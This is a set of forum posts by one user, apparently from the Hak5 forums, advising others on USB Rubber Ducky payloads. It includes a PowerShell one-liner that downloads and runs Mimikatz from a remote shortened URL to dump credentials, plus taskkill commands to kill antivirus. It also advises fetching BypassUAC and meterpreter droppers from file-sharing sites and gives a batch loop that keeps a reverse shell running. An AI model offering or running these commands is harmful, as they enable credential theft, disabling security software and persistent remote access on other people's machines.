[copy ducky files to c:\]

Hmm. If you are using a command prompt, then I would recommend just storing the files in the path variable %USERPROFILE%. You can even change directories to this as well by

cd %USERPROFILE%

With regards to the other problems, try doing this first. Often you won't be able to do a lot of ducky things without finding a way to invoke UAC Privileges.

[Duckyscript on a teensy? (3.1)]

Well, that would call for building your own compiler to write scripts as beautifully simplistic as duckyscript, and even then you would need to make sure that your teensy was compatible with other systems. Just support Hak5 and use their ducks.

[Dll injection questions]

Hello All,

I have a few questions regarding DLL injection to a server.

1) Is there any DLL injection vulnerability scanner ?

2) Is it possible to inject dll to server via web application bugs?

I am not sure about this. I recommend injecting a file through a java applet or something along those lines.

Good Luck!

[Applications in Memory!]

Nice. I really appreciate your help with this. Don't worry about me breaking any computer systems which I shouldn't be on. I am just demonstrating how you can exploit several venerabilities in systems with tools in memory. It is really a test which I am demonstrating.

[Applications in Memory!]

EDIT ON POST:

Is it possible to use the bypassUAC exploit on a machine with no privileges? I imagine not, but I need this to work. Any ideas?

[Applications in Memory!]

Marvelous. I am new to metasploit and I have the framework edition. To run the meterpreter, do I need a linux based OS, or can I use Cygwin or some other terminal emulator to get things done on my windows machine? (I don't want to use the community edition if I can help it!) :)

[Applications in Memory!]

Hi everyone,

I have seen the PowerSploit script on how Mimikatz can be loaded entirely into memory and used to dump credentials, and I was thinking would it be possible to load a program from metasploit, like bypassuac, which would usually be detected by an antivirus program into memory and use it from there? This could give you admin access to just about anything. Sadly, my knowledge on how to do this is lacking. If anyone could help with this, it would be much appreciated! :)

Cheers,

MB60893

[[PayLoad] The Ultimate Payload - Execute Files in seconds]

You could always use a VBScript to detect when the drive is there, then write the ducky drive letter to a .bat file. Then execute that Best thing is the VBScript won't be shown in any kind of console/terminal, so you are really going to make the script covert!

EDIT: I see that a newer vbscript has been added with the same properties. Just use that and modify if you have any further troubles.

[How does Anti Virus Work - Bypassing]

You are never going to be perfect with your antivirus detection and disabling techniques in any case. Your best bet is just to find a way of not triggering an AV.

[Possible Ducky Bug or Toolkit Bug]

Else just use CTRL ESC, or CONTROL ESCAPE, and that will bring up the Start Menu. Not a noobish thing to say at all, I got stuck with this myself for an extensive period of time! :P

[How does Anti Virus Work - Bypassing]

Hi again Lavanoid,

Check out PowerSploit and the section on Bypassing Antivirus. What this script does is it checks for a trace of an Antivirus, then the other programs kill the processes of the AV. Works great on my machines (quite extensive).

Cheers,

MB60893

[any payloads for ducky that will bypass av/ ids]

Not yet. HOWEVER, you should check out PowerSploit, especially the section on AntiVirus. Basically, it is a powershell script which will pick up an antivirus signature, which can then be used to disable the antivirus that you have.

[Tools for a Windows Admin]

Trinity Rescue Toolkit. Really useful, especially if you put all of these boot CD's on a USB key. See project "USB Multipass" in Hak5 Forums.

[[HELP] METERPRETER DROPPER]

I have had this problem recently myself. You can use something like SkyDrive, though. Make an account, and share the file with properties "Edit". No one unless they get the URL or can guess correctly out of the millions of combinations will be able to download the file. Give it a go. The link doesn't change either.

[[Payload]Super Simple Mouse Reverse]

Cool Trick! You could even go a step further and write a script which keeps changing the click every few seconds!

[Found cases that could possibly be used with the Duck.]

Check This out: http://www.thingiverse.com/thing:194826. Someone in the Hak5 Forums designed this case, and you can specify a 3D printer to print in transparent colours. Fits the duck and you can get it printed from a place near you cheaply from: http://www.makexyz.com/3dprinters/.

[[Payload] DT 2.5 (2.6 released in a few weeks) - Backup Passwords, Product Keys, Directory Listings and much more!]

Hi again Lavanoid,

You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 

You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!

Give it a go!

MB60893.

[How detectable is the rubber Ducky]

The thing about the duck is that it is acting as a USB Keyboard, so it is very hard for antivirus programs to detect. The thing that may make it not work is that the driver that is downloaded for the Ducky to work reads "HID - Human Interface Device". Aside from that, some keyboards come up with this, and they are not detected by any antivirus software. If you are trying to do miscellaneous things with the ducky, then certain antivirus programs may pick up the activity. The best thing to do is to start up a command prompt and disable the service or live monitoring processes of the antivirus program. For Microsoft Security Essentials, it is as simple as:

"taskkill /f /im msseces.exe /t"

For some other programs, it may be a matter of deleting a registry entry to stop it on startup. It is a good thing to watch out for when installing RATS and more.

[How long does it take and how long should I put]

Well if you can't count on it, then you might need to put up a delay up to a minute or so. It is something that we can't really predict, unless you manually install the driver off of a USB key, but that can also take time, and is generally slower than using the ducky. Sorry.

[Repeat command produces error]

If you type "USB Rubber Ducky Repeat" into google, you get the Hak5 page which says Firmware V2.4 released, and "Added Repeat Command". This means that your duck must be less than V2.4. You should update the duck ASAP if you wish to do this duckyscript justice! :)

[[Payload] DT 2.5 (2.6 released in a few weeks) - Backup Passwords, Product Keys, Directory Listings and much more!]

Well, without Administrative access, the only things the payload can do really is get Chrome login data, and Windows product keys. The procdump won't work because it requires access to another programs ram data - which needs admin access, Mimikatz won't work because once again - needs access to another programs ram data, and wifi keys cannot be recovered because of Microsofts encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine - it won't work. So the answear to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want.

You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

[[HELP] METERPRETER DROPPER]

Just backing up about MediaFire and all other sites where you can download files etc, make sure you right click the button and copy the link address. If this doesn't work just inspect the button element and copy the URL.

[Reverse Shell - Wait for Connection]

I think this would work: [bATCH FILE]

@echo off

:TOP

/t timeout 60

powershell Stop-Process -processname C:\reverse.exe

powershell Start-Process C:\reverse.exe

GOTO TOP

The only problem is that it kinda restarts the program even if it running. I imagine that being able to not restart if it's already on would be pretty difficult. If you have access with netcat to their computer, I think you would be able to move this file to the startup folder.

[sAVE IT AS A .BAT file.]

While this is a good idea, I still only wish to modify the source code, hence why I am still leaving this thread as unsolved. Thanks everyone so far, but please keep these ideas coming!

[PowerShell UAC Bypass ?]

You could always use the metasploit tool "BypassUAC". Works great and with a simple wget off of a service like MediaFire or DropBox, it is a no brainer. Just remember to disable pesky antivirus! :D

[VBS Autorun Help]

Hi,

If you want to detect the drive, then I suggest doing what was done in Hak5 episode of Ducky Exfiltration (one of the earliest episodes of season 15) and create a drive with a name like ducky, so that it will be able to detect where the update software is, then it should run and get all the files off of the USB. Just modify your batch script to do this and you should be hunkey dorey! :)

Cheers,

MB60893.